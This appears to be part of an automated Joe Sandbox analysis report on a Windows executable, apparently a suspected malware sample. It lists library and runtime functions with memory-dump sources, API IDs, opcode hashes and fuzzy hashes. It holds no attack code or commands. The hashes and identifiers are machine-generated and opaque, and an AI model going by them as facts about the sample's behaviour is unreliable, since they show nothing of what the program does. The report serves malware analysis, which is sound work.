                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                  • Opcode ID: 2e0b102997a663f87b82603eaa612d359689302552e43b248b4a8085f57861c4
                                                                                                                                                                                                  • Instruction ID: 6eb9957a042c161528fcdcc4a9df558c11ec6c3ea54fa32b313c9c845e9cc55b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e0b102997a663f87b82603eaa612d359689302552e43b248b4a8085f57861c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39D0922CB8C616C7F6083B7158D9139A2526F58F41B841838D80B063A2DE3EAC8D4267
                                                                                                                                                                                                  Function 00007FF7450266DC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1807457897-3916222277
                                                                                                                                                                                                  • Opcode ID: 7e12dfcac08929580308454bf1e9e9c4c76a006127b8af995ca6b0a52a3bd218
                                                                                                                                                                                                  • Instruction ID: c72ad79ded43eb2c3291259ef47e163e46f704c48d186723f204a3e82256394c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e12dfcac08929580308454bf1e9e9c4c76a006127b8af995ca6b0a52a3bd218
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0751B076A1C6C1CAE721AF34E0843AEBBA0F748B44F94423AE68D43A55CF3CD955CB50
                                                                                                                                                                                                  Function 00007FF745021E00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: String
                                                                                                                                                                                                  • String ID: LCMapStringEx
                                                                                                                                                                                                  • API String ID: 2568140703-3893581201
                                                                                                                                                                                                  • Opcode ID: a5adf0613c75226ea2f9640fb65b48135399a53f3e9b40446c759ae4a968422a
                                                                                                                                                                                                  • Instruction ID: 4a5b0e8a590fd0f42809e40c362cb6591f1d80dde19e0c713f06ca37e8c9e407
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5adf0613c75226ea2f9640fb65b48135399a53f3e9b40446c759ae4a968422a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0214135A0CB81C5DB60EF56B48066AB3A4FB89F94F844135EE9C83BA9DF3CD4508B00
                                                                                                                                                                                                  Function 00007FF745021924 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                  • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                                                  • API String ID: 544645111-2031265017
                                                                                                                                                                                                  • Opcode ID: a57f9de3c4d0136217b4ec26e4b066ee5c6f88529386b6aaa1c63c08f26543e5
                                                                                                                                                                                                  • Instruction ID: acfa00fb8efcc0ec20cad9877e132b51ae439356a85b42ee0dcc247359018365
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a57f9de3c4d0136217b4ec26e4b066ee5c6f88529386b6aaa1c63c08f26543e5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB115425A0C64AA1E614BBA6A8405B5A350BB49FB4F944730FE7C077E4DF3CE955C610
                                                                                                                                                                                                  Function 00007FF745026C78 Relevance: 3.2, APIs: 2, Instructions: 197COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF7450265C4: GetOEMCP.KERNEL32 ref: 00007FF7450265EE
                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(?,?,?,?,?,00000000,?,00007FF745026A41), ref: 00007FF745026CF3
                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,?,?,?,00000000,?,00007FF745026A41), ref: 00007FF745026D37
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 546120528-0
                                                                                                                                                                                                  • Opcode ID: 77d7de772ae6a1290ed9834418c030efa9d6ccbb64528a68dca8826862516094
                                                                                                                                                                                                  • Instruction ID: 68647404a33a70bbeeb696463c8cda5119f970b9a6fd371ad38059d6823d40cd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77d7de772ae6a1290ed9834418c030efa9d6ccbb64528a68dca8826862516094
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7681CF6AE0C696C6EB64BF35D040179F6A1AB45F80FD84136E68E47AA1DE3DFD41C320
                                                                                                                                                                                                  Function 00007FF745013778 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3548387204-0
                                                                                                                                                                                                  • Opcode ID: 78340a4773d28b5b3b4d3956d34de224723ef3ecf892ad03741a19342b2a140a
                                                                                                                                                                                                  • Instruction ID: 07b6717178723067b277f7c07582e591a16637191ba3f4621d6012e4a156ebab
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78340a4773d28b5b3b4d3956d34de224723ef3ecf892ad03741a19342b2a140a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66119858E0C207C1FA687BB1655A2F982805F55F49FC50438E98D862F3BE1EB8458673
                                                                                                                                                                                                  Function 00007FF745026F68 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF74501C9C2), ref: 00007FF745026F7C
                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF74501C9C2), ref: 00007FF745026FE6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3328510275-0
                                                                                                                                                                                                  • Opcode ID: e4818ef3e26270688daeb8716528ecc1a80a2eef75e024d3094dc078332db2ce
                                                                                                                                                                                                  • Instruction ID: 779bd2b24a955242987de02a6a34efd6c2e450064fa4bca2237cceed7a25bde9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4818ef3e26270688daeb8716528ecc1a80a2eef75e024d3094dc078332db2ce
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F01A115E0D765C1EE64BB32641102AE360AB54FE0BC84634FF6E03BE5DE3CEC428660
                                                                                                                                                                                                  Function 00007FF74502149C Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                                  • Opcode ID: a278e31c0c0b3efc51ed99217641f3d5b30a632b74c31a2da611b930d468b64a
                                                                                                                                                                                                  • Instruction ID: 82671d1a9edbbd220f49620c9baa055ce56308f543c0607d6a1292cfb9064e29
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a278e31c0c0b3efc51ed99217641f3d5b30a632b74c31a2da611b930d468b64a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D216565F0C692C1EE50B7B5A490379E2925F44FA4FC84279FA1E477E5DE7CEC418220
                                                                                                                                                                                                  Function 00007FF74501CDB6 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                                  • Opcode ID: ec2e625380941a45671745544d02a38661e6b2e9d8a39f80ea1396c7c00dcf14
                                                                                                                                                                                                  • Instruction ID: 4ccb2669fbadfb5868a2d5af3768abf7702d1375f46e97a3d1a221b997929b79
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec2e625380941a45671745544d02a38661e6b2e9d8a39f80ea1396c7c00dcf14
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6216F36E48702C9EB20BF7484812BC77E4FB04B18F841635D61D02AE5EF39D485C76A
                                                                                                                                                                                                  Function 00007FF74501B6E0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: d699ace951f14fdf64431f85461304cb917bf26456254af4fc2d594a1fe7d74f
                                                                                                                                                                                                  • Instruction ID: 4eada6d03dd75cd0cdcf826f0ed361ca2d73500b750a8ba36bf5013cf28166a1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d699ace951f14fdf64431f85461304cb917bf26456254af4fc2d594a1fe7d74f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78119329A0C645C1EA60BF61941017EE2A0BFA4F84FC84435EECD477A6EF7ED4004B62
                                                                                                                                                                                                  Function 00007FF74502A5D0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 47fcc5eb06481042441da6cfd58a272eacd0ecc1c94da9c063df195aac6ec2b8
                                                                                                                                                                                                  • Instruction ID: 2517e3234532510e105027751bc3c5c6976b76081447a989dd81a2ac424c2577
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47fcc5eb06481042441da6cfd58a272eacd0ecc1c94da9c063df195aac6ec2b8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2321B03660C682C7DB61BF28D44036AB2A1EB84F94F984234FB5D876E9DF7CD8048B10
                                                                                                                                                                                                  Function 00007FF74501DCC4 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 94fda180b8da13f2a3aabe89a07b057684dd586ade090a2cefa4f2b3b8c3eea8
                                                                                                                                                                                                  • Instruction ID: be494a89565d27f775522f5fa20aae4af3773baf0f74552479dc535621d179e7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94fda180b8da13f2a3aabe89a07b057684dd586ade090a2cefa4f2b3b8c3eea8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87114736A08B16DCEB00AFB0D4812ED37B4EB0875CF900526EA4C12B69EF34C194C3A0
                                                                                                                                                                                                  Function 00007FF745013D68 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF745013D7C
                                                                                                                                                                                                    • Part of subcall function 00007FF7450158E0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF7450158E8
                                                                                                                                                                                                    • Part of subcall function 00007FF7450158E0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF7450158ED
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1208906642-0
                                                                                                                                                                                                  • Opcode ID: 6f5e15f92305e6e0ba47c78896a71fbf5e7724418de824e5270b3df5456a1180
                                                                                                                                                                                                  • Instruction ID: 49de20d2d006b270843bf60e024624dd398ccd18f239d1709f0b46ac0c9d9878
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f5e15f92305e6e0ba47c78896a71fbf5e7724418de824e5270b3df5456a1180
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56E0BD5CD0DA43C4FE683A3020462F886405F22B88FC004B8E8CE161A3BE1F70861A33
                                                                                                                                                                                                  Function 00007FF7450200CC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __vcrt_uninitialize_ptd
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1180542099-0
                                                                                                                                                                                                  • Opcode ID: fc07ed4da2af6a14bdea54ecf6624b54e607c27b8fa1a533bb4c639d3d1477c1
                                                                                                                                                                                                  • Instruction ID: 15faea07adf9782505ae13db2291310d65eff92033c29376001da904df3d26b0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc07ed4da2af6a14bdea54ecf6624b54e607c27b8fa1a533bb4c639d3d1477c1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CE01A28D0D243D0F929777524624B992512F66F10FD40935F52D426F7BE3D79449632
                                                                                                                                                                                                  Function 00007FF745022114 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                  • Opcode ID: 0bad1824035c984c421925e17e06a9ff2395b13a2119324378511e1baa27230c
                                                                                                                                                                                                  • Instruction ID: 3c49e19b6e1b2cfa3bf2bbb915ba51562139f796602dd341605a8b32e205eaeb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bad1824035c984c421925e17e06a9ff2395b13a2119324378511e1baa27230c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11D0C939B39541C3E300AB22E8457A5A328B798B51FC44025F94A826988F7CC659CB20
                                                                                                                                                                                                  Function 00007FF7450203C0 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                  • Opcode ID: d372c71fffb221a83cbde8ea10ba771d5b2feb5002571b443168851f989c780c
                                                                                                                                                                                                  • Instruction ID: 0029e4db41437a5f8e91adf08e99e0f35a60ac1653af2e2e1a09f2c15ddb2b49
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d372c71fffb221a83cbde8ea10ba771d5b2feb5002571b443168851f989c780c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2F04F98B0D307C5FE64767255642B5E2856F44F50FCC5430EE0E866E2EE3CE8804231
